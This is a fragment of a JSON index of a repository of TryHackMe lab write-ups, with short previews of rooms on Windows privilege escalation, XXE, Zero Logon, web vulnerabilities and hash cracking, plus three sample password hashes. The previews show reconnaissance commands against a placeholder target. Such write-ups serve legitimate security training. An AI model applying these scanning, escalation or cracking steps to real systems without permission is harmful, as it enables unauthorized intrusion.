"preview": "# Windows PrivEsc\n\n- Deploy the Windows VM and login using the \"user\" account.\n\n\t no answer needed\n\n- Generate a revers"
},
{
"path": "Wireshark-101/README.md",
"chars": 2910,
"preview": "# Wireshark 101\n\n- Read the above and move on to Installation.\n\n\t no answer needed\n\n- Read the above, and ensure you ha"
},
{
"path": "XXE/README.md",
"chars": 1102,
"preview": "# XXE\n\n- Deploy the VM\n\n\t no answer needed\n\n- Full form of XML\n\n\t- `Extensible markup Language`\n\n- Is XML case sensitiv"
},
{
"path": "Year-of-the-Rabbit/README.md",
"chars": 1184,
"preview": "# Year of the Rabbit\n\n- What is the user flag?\n\n\t- `scilla port -target <TARGET_IP>`\n\t- `21, 22, 80` open.\n\t- `scilla di"
},
{
"path": "ZTH:-Obscure-Web-Vulns/README.md",
"chars": 1894,
"preview": "# ZTH: Obscure Web Vulns\n\n- Read the Intro.\n\n\t no answer needed\n\n- Read the above!\n\n\t no answer needed\n\n- Read the abo"
},
{
"path": "ZTH:-Web_2/README.md",
"chars": 629,
"preview": "# ZTH: Web 2\n\n- Read the above\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above.\n\n\t no an"
},
{
"path": "Zero-Logon/README.md",
"chars": 1240,
"preview": "# Zero Logon\n\n- Read about Zero Logon\n\n\t no answer needed\n\n- Install Impacket in a Virtual Environment \n\n\t no answer n"
},
{
"path": "cc-pentesting/README.md",
"chars": 12092,
"preview": "# CC - PENTESTING // TRYHACKME\n\n### [Section 1 - Network Utilities] - nmap \n\n- What does nmap stand for?\n\n\t- `network ma"
},
{
"path": "crack-the-hash/hash1_4.txt",
"chars": 61,
"preview": "$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom\n"
},
{
"path": "crack-the-hash/hash2_1.txt",
"chars": 65,
"preview": "F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85\n"
},
{
"path": "crack-the-hash/hash2_2.txt",
"chars": 33,
"preview": "1DFECA0C002AE40B8619ECF94819CC1B\n"
}
]